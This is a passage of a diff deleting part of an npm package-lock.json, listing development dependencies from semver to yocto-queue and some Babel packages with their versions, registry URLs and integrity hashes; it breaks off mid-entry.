"sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", - "dev": true, - "bin": { - "semver": "bin/semver.js" - } - }, - "node_modules/shebang-command": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", - "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", - "dev": true, - "dependencies": { - "shebang-regex": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/shebang-regex": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", - "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/signal-exit": { - "version": "3.0.7", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-3.0.7.tgz", - "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==", - "dev": true - }, - "node_modules/sisteransi": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/sisteransi/-/sisteransi-1.0.5.tgz", - "integrity": "sha512-bLGGlR1QxBcynn2d5YmDX4MGjlZvy2MRBDRNHLJ8VI6l6+9FUiyTFNJ0IveOSP0bcXgVDPRcfGqA0pjaqUpfVg==", - "dev": true - }, - "node_modules/slash": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", - "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/source-map": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.6.1.tgz", - "integrity": "sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/source-map-support": { - "version": "0.5.13", - "resolved": "https://registry.npmjs.org/source-map-support/-/source-map-support-0.5.13.tgz", - "integrity": "sha512-SHSKFHadjVA5oR4PPqhtAVdcBWwRYVd6g6cAXnIbRiIwc2EhPrTuKUBdSLvlEKyIP3GCf89fltvcZiP9MMFA1w==", - "dev": true, - "dependencies": { - "buffer-from": "^1.0.0", - "source-map": "^0.6.0" - } - }, - "node_modules/sprintf-js": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.0.3.tgz", - "integrity": "sha512-D9cPgkvLlV3t3IzL0D0YLvGA9Ahk4PcvVwUbN0dSGr1aP0Nrt4AEnTUbuGvquEC0mA64Gqt1fzirlRs5ibXx8g==", - "dev": true - }, - "node_modules/sshpk": { - "version": "1.17.0", - "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.17.0.tgz", - "integrity": "sha512-/9HIEs1ZXGhSPE8X6Ccm7Nam1z8KcoCqPdI7ecm1N33EzAetWahvQWVqLZtaZQ+IDKX4IyA2o0gBzqIMkAagHQ==", - "dev": true, - "dependencies": { - "asn1": "~0.2.3", - "assert-plus": "^1.0.0", - "bcrypt-pbkdf": "^1.0.0", - "dashdash": "^1.12.0", - "ecc-jsbn": "~0.1.1", - "getpass": "^0.1.1", - "jsbn": "~0.1.0", - "safer-buffer": "^2.0.2", - "tweetnacl": "~0.14.0" - }, - "bin": { - "sshpk-conv": "bin/sshpk-conv", - "sshpk-sign": "bin/sshpk-sign", - "sshpk-verify": "bin/sshpk-verify" - }, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/stack-utils": { - "version": "2.0.6", - "resolved": "https://registry.npmjs.org/stack-utils/-/stack-utils-2.0.6.tgz", - "integrity": "sha512-XlkWvfIm6RmsWtNJx+uqtKLS8eqFbxUg0ZzLXqY0caEy9l7hruX8IpiDnjsLavoBgqCCR71TqWO8MaXYheJ3RQ==", - "dev": true, - "dependencies": { - "escape-string-regexp": "^2.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/stream-buffers": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/stream-buffers/-/stream-buffers-3.0.2.tgz", - "integrity": "sha512-DQi1h8VEBA/lURbSwFtEHnSTb9s2/pwLEaFuNhXwy1Dx3Sa0lOuYT2yNUr4/j2fs8oCAMANtrZ5OrPZtyVs3MQ==", - "dev": true, - "engines": { - "node": ">= 0.10.0" - } - }, - "node_modules/string-length": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/string-length/-/string-length-4.0.2.tgz", - "integrity": "sha512-+l6rNN5fYHNhZZy41RXsYptCjA2Igmq4EG7kZAYFQI1E1VTXarr6ZPXBg6eq7Y6eK4FEhY6AJlyuFIb/v/S0VQ==", - "dev": true, - "dependencies": { - "char-regex": "^1.0.2", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/string-width": { - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "dev": true, - "dependencies": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "dev": true, - "dependencies": { - "ansi-regex": "^5.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-bom": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/strip-bom/-/strip-bom-4.0.0.tgz", - "integrity": "sha512-3xurFv5tEgii33Zi8Jtp55wEIILR9eh34FAW00PZf+JnSsTmV/ioewSgQl97JHvgjoRGwPShsWm+IdrxB35d0w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-final-newline": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/strip-final-newline/-/strip-final-newline-2.0.0.tgz", - "integrity": "sha512-BrpvfNAE3dcvq7ll3xVumzjKjZQ5tI1sEUIKr3Uoks0XUl45St3FlatVqef9prk4jRDzhW6WZg+3bk93y6pLjA==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/strip-json-comments": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/strip-json-comments/-/strip-json-comments-3.1.1.tgz", - "integrity": "sha512-6fPc+R4ihwqP6N/aIv2f1gMH8lOVtWQHoqC4yK6oSDVVocumAsfCqjkXnqiYMhmMwS/mEHLp7Vehlt3ql6lEig==", - "dev": true, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/supports-color": { - "version": "7.2.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", - "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", - "dev": true, - "dependencies": { - "has-flag": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/supports-preserve-symlinks-flag": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", - "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", - "dev": true, - "engines": { - "node": ">= 0.4" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/tar": { - "version": "6.2.1", - "resolved": "https://registry.npmjs.org/tar/-/tar-6.2.1.tgz", - "integrity": "sha512-DZ4yORTwrbTj/7MZYq2w+/ZFdI6OZ/f9SFHR+71gIVUZhOQPHzVCLpvRnPgyaMpfWxxk/4ONva3GQSyNIKRv6A==", - "dev": true, - "dependencies": { - "chownr": "^2.0.0", - "fs-minipass": "^2.0.0", - "minipass": "^5.0.0", - "minizlib": "^2.1.1", - "mkdirp": "^1.0.3", - "yallist": "^4.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/tar/node_modules/minipass": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-5.0.0.tgz", - "integrity": "sha512-3FnjYuehv9k6ovOEbyOswadCDPX1piCfhV8ncmYtHOjuPwylVWsghTLo7rabjC3Rx5xD4HDx8Wm1xnMF7S5qFQ==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/test-exclude": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/test-exclude/-/test-exclude-6.0.0.tgz", - "integrity": "sha512-cAGWPIyOHU6zlmg88jwm7VRyXnMN7iV68OGAbYDk/Mh/xC/pzVPlQtY6ngoIH/5/tciuhGfvESU8GrHrcxD56w==", - "dev": true, - "dependencies": { - "@istanbuljs/schema": "^0.1.2", - "glob": "^7.1.4", - "minimatch": "^3.0.4" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/tmpl": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/tmpl/-/tmpl-1.0.5.tgz", - "integrity": "sha512-3f0uOEAQwIqGuWW2MVzYg8fV/QNnc/IpuJNG837rLuczAaLVHslWHZQj4IGiEl5Hs3kkbhwL9Ab7Hrsmuj+Smw==", - "dev": true - }, - "node_modules/to-regex-range": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", - "integrity": "sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==", - "dev": true, - "dependencies": { - "is-number": "^7.0.0" - }, - "engines": { - "node": ">=8.0" - } - }, - "node_modules/tough-cookie": { - "version": "2.5.0", - "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", - "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", - "dev": true, - "dependencies": { - "psl": "^1.1.28", - "punycode": "^2.1.1" - }, - "engines": { - "node": ">=0.8" - } - }, - "node_modules/ts-jest": { - "version": "29.2.5", - "resolved": "https://registry.npmjs.org/ts-jest/-/ts-jest-29.2.5.tgz", - "integrity": "sha512-KD8zB2aAZrcKIdGk4OwpJggeLcH1FgrICqDSROWqlnJXGCXK4Mn6FcdK2B6670Xr73lHMG1kHw8R87A0ecZ+vA==", - "dev": true, - "dependencies": { - "bs-logger": "^0.2.6", - "ejs": "^3.1.10", - "fast-json-stable-stringify": "^2.1.0", - "jest-util": "^29.0.0", - "json5": "^2.2.3", - "lodash.memoize": "^4.1.2", - "make-error": "^1.3.6", - "semver": "^7.6.3", - "yargs-parser": "^21.1.1" - }, - "bin": { - "ts-jest": "cli.js" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || ^18.0.0 || >=20.0.0" - }, - "peerDependencies": { - "@babel/core": ">=7.0.0-beta.0 <8", - "@jest/transform": "^29.0.0", - "@jest/types": "^29.0.0", - "babel-jest": "^29.0.0", - "jest": "^29.0.0", - "typescript": ">=4.3 <6" - }, - "peerDependenciesMeta": { - "@babel/core": { - "optional": true - }, - "@jest/transform": { - "optional": true - }, - "@jest/types": { - "optional": true - }, - "babel-jest": { - "optional": true - }, - "esbuild": { - "optional": true - } - } - }, - "node_modules/ts-jest/node_modules/semver": { - "version": "7.6.3", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", - "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", - "dev": true, - "bin": { - "semver": "bin/semver.js" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/tslib": { - "version": "2.5.0", - "resolved": "https://registry.npmjs.org/tslib/-/tslib-2.5.0.tgz", - "integrity": "sha512-336iVw3rtn2BUK7ORdIAHTyxHGRIHVReokCR3XjbckJMK7ms8FysBfhLR8IXnAgy7T0PTPNBWKiH514FOW/WSg==", - "dev": true - }, - "node_modules/tunnel-agent": { - "version": "0.6.0", - "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", - "integrity": "sha1-J6XeoGs2sEoKmWZ3SykIaPD8QP0=", - "dev": true, - "dependencies": { - "safe-buffer": "^5.0.1" - }, - "engines": { - "node": "*" - } - }, - "node_modules/tweetnacl": { - "version": "0.14.5", - "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", - "integrity": "sha1-WuaBd/GS1EViadEIr6k/+HQ/T2Q=", - "dev": true - }, - "node_modules/type-detect": { - "version": "4.0.8", - "resolved": "https://registry.npmjs.org/type-detect/-/type-detect-4.0.8.tgz", - "integrity": "sha512-0fr/mIH1dlO+x7TlcMy+bIDqKPsw/70tVyeHW787goQjhmqaZe10uwLujubK9q9Lg6Fiho1KUKDYz0Z7k7g5/g==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/type-fest": { - "version": "0.21.3", - "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.21.3.tgz", - "integrity": "sha512-t0rzBq87m3fVcduHDUFhKmyyX+9eo6WQjZvf51Ea/M0Q7+T374Jp1aUiyUl0GKxp8M/OETVHSDvmkyPgvX+X2w==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/typescript": { - "version": "5.7.2", - "resolved": "https://registry.npmjs.org/typescript/-/typescript-5.7.2.tgz", - "integrity": "sha512-i5t66RHxDvVN40HfDd1PsEThGNnlMCMT3jMUuoh9/0TaqWevNontacunWyN02LA9/fIbEWlcHZcgTKb9QoaLfg==", - "dev": true, - "peer": true, - "bin": { - "tsc": "bin/tsc", - "tsserver": "bin/tsserver" - }, - "engines": { - "node": ">=14.17" - } - }, - "node_modules/undici-types": { - "version": "6.19.8", - "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-6.19.8.tgz", - "integrity": "sha512-ve2KP6f/JnbPBFyobGHuerC9g1FYGn/F8n1LWTwNxCEzd6IfqTwUQcNXgEtmmQ6DlRrC1hrSrBnCZPokRrDHjw==", - "dev": true - }, - "node_modules/update-browserslist-db": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/update-browserslist-db/-/update-browserslist-db-1.1.1.tgz", - "integrity": "sha512-R8UzCaa9Az+38REPiJ1tXlImTJXlVfgHZsglwBD/k6nj76ctsH1E3q4doGrukiLQd3sGQYu56r5+lo5r94l29A==", - "dev": true, - "funding": [ - { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - }, - { - "type": "tidelift", - "url": "https://tidelift.com/funding/github/npm/browserslist" - }, - { - "type": "github", - "url": "https://github.com/sponsors/ai" - } - ], - "dependencies": { - "escalade": "^3.2.0", - "picocolors": "^1.1.0" - }, - "bin": { - "update-browserslist-db": "cli.js" - }, - "peerDependencies": { - "browserslist": ">= 4.21.0" - } - }, - "node_modules/uri-js": { - "version": "4.4.1", - "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", - "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", - "dev": true, - "dependencies": { - "punycode": "^2.1.0" - } - }, - "node_modules/uuid": { - "version": "3.4.0", - "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", - "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==", - "deprecated": "Please upgrade to version 7 or higher. Older versions may use Math.random() in certain circumstances, which is known to be problematic. See https://v8.dev/blog/math-random for details.", - "dev": true, - "bin": { - "uuid": "bin/uuid" - } - }, - "node_modules/v8-to-istanbul": { - "version": "9.3.0", - "resolved": "https://registry.npmjs.org/v8-to-istanbul/-/v8-to-istanbul-9.3.0.tgz", - "integrity": "sha512-kiGUalWN+rgBJ/1OHZsBtU4rXZOfj/7rKQxULKlIzwzQSvMJUUNgPwJEEh7gU6xEVxC0ahoOBvN2YI8GH6FNgA==", - "dev": true, - "dependencies": { - "@jridgewell/trace-mapping": "^0.3.12", - "@types/istanbul-lib-coverage": "^2.0.1", - "convert-source-map": "^2.0.0" - }, - "engines": { - "node": ">=10.12.0" - } - }, - "node_modules/verror": { - "version": "1.10.0", - "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", - "integrity": "sha1-OhBcoXBTr1XW4nDB+CiGguGNpAA=", - "dev": true, - "engines": [ - "node >=0.6.0" - ], - "dependencies": { - "assert-plus": "^1.0.0", - "core-util-is": "1.0.2", - "extsprintf": "^1.2.0" - } - }, - "node_modules/walker": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/walker/-/walker-1.0.8.tgz", - "integrity": "sha512-ts/8E8l5b7kY0vlWLewOkDXMmPdLcVV4GmOQLyxuSswIJsweeFZtAsMF7k1Nszz+TYBQrlYRmzOnr398y1JemQ==", - "dev": true, - "dependencies": { - "makeerror": "1.0.12" - } - }, - "node_modules/which": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", - "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", - "dev": true, - "dependencies": { - "isexe": "^2.0.0" - }, - "bin": { - "node-which": "bin/node-which" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/wrap-ansi": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "dev": true, - "dependencies": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/wrap-ansi?sponsor=1" - } - }, - "node_modules/wrappy": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", - "integrity": "sha1-tSQ9jz7BqjXxNkYFvA0QNuMKtp8=", - "dev": true - }, - "node_modules/write-file-atomic": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-4.0.2.tgz", - "integrity": "sha512-7KxauUdBmSdWnmpaGFg+ppNjKF8uNLry8LyzjauQDOVONfFLNKrKvQOxZ/VuTIcS/gge/YNahf5RIIQWTSarlg==", - "dev": true, - "dependencies": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || >=16.0.0" - } - }, - "node_modules/ws": { - "version": "8.12.0", - "resolved": "https://registry.npmjs.org/ws/-/ws-8.12.0.tgz", - "integrity": "sha512-kU62emKIdKVeEIOIKVegvqpXMSTAMLJozpHZaJNDYqBjzlSYXQGviYwN1osDLJ9av68qHd4a2oSjd7yD4pacig==", - "dev": true, - "engines": { - "node": ">=10.0.0" - }, - "peerDependencies": { - "bufferutil": "^4.0.1", - "utf-8-validate": ">=5.0.2" - }, - "peerDependenciesMeta": { - "bufferutil": { - "optional": true - }, - "utf-8-validate": { - "optional": true - } - } - }, - "node_modules/y18n": { - "version": "5.0.8", - "resolved": "https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz", - "integrity": "sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", - "dev": true - }, - "node_modules/yargs": { - "version": "17.7.2", - "resolved": "https://registry.npmjs.org/yargs/-/yargs-17.7.2.tgz", - "integrity": "sha512-7dSzzRQ++CKnNI/krKnYRV7JKKPUXMEh61soaHKg9mrWEhzFWhFnxPxGl+69cD1Ou63C13NUPCnmIcrvqCuM6w==", - "dev": true, - "dependencies": { - "cliui": "^8.0.1", - "escalade": "^3.1.1", - "get-caller-file": "^2.0.5", - "require-directory": "^2.1.1", - "string-width": "^4.2.3", - "y18n": "^5.0.5", - "yargs-parser": "^21.1.1" - }, - "engines": { - "node": ">=12" - } - }, - "node_modules/yargs-parser": { - "version": "21.1.1", - "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz", - "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==", - "dev": true, - "engines": { - "node": ">=12" - } - }, - "node_modules/yocto-queue": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-0.1.0.tgz", - "integrity": "sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - } - }, - "dependencies": { - "@ampproject/remapping": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/@ampproject/remapping/-/remapping-2.2.0.tgz", - "integrity": "sha512-qRmjj8nj9qmLTQXXmaR1cck3UXSRMPrbsLJAasZpF+t3riI71BXed5ebIOYwQntykeZuhjsdweEc9BxH5Jc26w==", - "dev": true, - "requires": { - "@jridgewell/gen-mapping": "^0.1.0", - "@jridgewell/trace-mapping": "^0.3.9" - } - }, - "@babel/code-frame": { - "version": "7.26.2", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.26.2.tgz", - "integrity": "sha512-RJlIHRueQgwWitWgF8OdFYGZX328Ax5BCemNGlqHfplnRT9ESi8JkFlvaVYbS+UubVY6dpv87Fs2u5M29iNFVQ==", - "dev": true, - "requires": { - "@babel/helper-validator-identifier": "^7.25.9", - "js-tokens": "^4.0.0", - "picocolors": "^1.0.0" - } - }, - "@babel/compat-data": { - "version": "7.26.2", - "resolved": "https://registry.npmjs.org/@babel/compat-data/-/compat-data-7.26.2.tgz", - "integrity": "sha512-Z0WgzSEa+aUcdiJuCIqgujCshpMWgUpgOxXotrYPSA53hA3qopNaqcJpyr0hVb1FeWdnqFA35/fUtXgBK8srQg==", - "dev": true - }, - "@babel/core": { - "version": "7.26.0", - "resolved": "https://registry.npmjs.org/@babel/core/-/core-7.26.0.tgz", - "integrity": "sha512-i1SLeK+DzNnQ3LL/CswPCa/E5u4lh1k6IAEphON8F+cXt0t9euTshDru0q7/IqMa1PMPz5RnHuHscF8/ZJsStg==", - "dev": true, - "requires": { - "@ampproject/remapping": "^2.2.0", - "@babel/code-frame": "^7.26.0", - "@babel/generator": "^7.26.0", - "@babel/helper-compilation-targets": "^7.25.9", - "@babel/helper-module-transforms": "^7.26.0", - "@babel/helpers": "^7.26.0", - "@babel/parser": "^7.26.0", - "@babel/template": "^7.25.9", - "@babel/traverse": "^7.25.9", - "@babel/types": "^7.26.0", - "convert-source-map": "^2.0.0", - "debug": "^4.1.0", - "gensync": "^1.0.0-beta.2", - "json5": "^2.2.3", - "semver": "^6.3.1" - } - }, - "@babel/generator": { - "version": "7.26.2", - "resolved": "https://registry.npmjs.org/@babel/generator/-/generator-7.26.2.tgz", - "integrity": "sha512-zevQbhbau95nkoxSq3f/DC/SC+EEOUZd3DYqfSkMhY2/wfSeaHV1Ew4vk8e+x8lja31IbyuUa2uQ3JONqKbysw==", - "dev": true, - "requires": { - "@babel/parser": "^7.26.2", - "@babel/types": "^7.26.0", - "@jridgewell/gen-mapping": "^0.3.5", - "@jridgewell/trace-mapping": "^0.3.25", - "jsesc": "^3.0.2" - }, - "dependencies": { - "@jridgewell/gen-mapping": { - "version": "0.3.5", - "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.5.tgz", - "integrity": "sha512-IzL8ZoEDIBRWEzlCcRhOaCupYyN5gdIK+Q6fbFdPDg6HqX6jpkItn7DFIpW9LQzXG6Df9sA7+OKnq0qlz/GaQg==", - "dev": true, - "requires": { - "@jridgewell/set-array": "^1.2.1", - "@jridgewell/sourcemap-codec": "^1.4.10", - "@jridgewell/trace-mapping": "^0.3.24" - } - } - } - }, - "@babel/helper-compilation-targets": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-compilation-targets/-/helper-compilation-targets-7.25.9.tgz", - "integrity": "sha512-j9Db8Suy6yV/VHa4qzrj9yZfZxhLWQdVnRlXxmKLYlhWUVB1sB2G5sxuWYXk/whHD9iW76PmNzxZ4UCnTQTVEQ==", - "dev": true, - "requires": { - "@babel/compat-data": "^7.25.9", - "@babel/helper-validator-option": "^7.25.9", - "browserslist": "^4.24.0", - "lru-cache": "^5.1.1", - "semver": "^6.3.1" - }, - "dependencies": { - "lru-cache": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-5.1.1.tgz", - "integrity": "sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w==", - "dev": true, - "requires": { - "yallist": "^3.0.2" - } - }, - "yallist": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.1.1.tgz", - "integrity": "sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==", - "dev": true - } - } - }, - "@babel/helper-module-imports": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-module-imports/-/helper-module-imports-7.25.9.tgz", - "integrity": "sha512-tnUA4RsrmflIM6W6RFTLFSXITtl0wKjgpnLgXyowocVPrbYrLUXSBXDgTs8BlbmIzIdlBySRQjINYs2BAkiLtw==", - "dev": true, - "requires": { - "@babel/traverse": "^7.25.9", - "@babel/types": "^7.25.9" - } - }, - "@babel/helper-module-transforms": { - "version": "7.26.0", - "resolved": "https://registry.npmjs.org/@babel/helper-module-transforms/-/helper-module-transforms-7.26.0.tgz", - "integrity": "sha512-xO+xu6B5K2czEnQye6BHA7DolFFmS3LB7stHZFaOLb1pAwO1HWLS8fXA+eh0A2yIvltPVmx3eNNDBJA2SLHXFw==", - "dev": true, - "requires": { - "@babel/helper-module-imports": "^7.25.9", - "@babel/helper-validator-identifier": "^7.25.9", - "@babel/traverse": "^7.25.9" - } - }, - "@babel/helper-plugin-utils": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-plugin-utils/-/helper-plugin-utils-7.25.9.tgz", - "integrity": "sha512-kSMlyUVdWe25rEsRGviIgOWnoT/nfABVWlqt9N19/dIPWViAOW2s9wznP5tURbs/IDuNk4gPy3YdYRgH3uxhBw==", - "dev": true - }, - "@babel/helper-string-parser": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-string-parser/-/helper-string-parser-7.25.9.tgz", - "integrity": "sha512-4A/SCr/2KLd5jrtOMFzaKjVtAei3+2r/NChoBNoZ3EyP/+GlhoaEGoWOZUmFmoITP7zOJyHIMm+DYRd8o3PvHA==", - "dev": true - }, - "@babel/helper-validator-identifier": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.25.9.tgz", - "integrity": "sha512-Ed61U6XJc3CVRfkERJWDz4dJwKe7iLmmJsbOGu9wSloNSFttHV0I8g6UAgb7qnK5ly5bGLPd4oXZlxCdANBOWQ==", - "dev": true - }, - "@babel/helper-validator-option": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-option/-/helper-validator-option-7.25.9.tgz", - "integrity": "sha512-e/zv1co8pp55dNdEcCynfj9X7nyUKUXoUEwfXqaZt0omVOmDe9oOTdKStH4GmAw6zxMFs50ZayuMfHDKlO7Tfw==", - "dev": true - }, - "@babel/helpers": { - "version": "7.26.0", - "resolved": 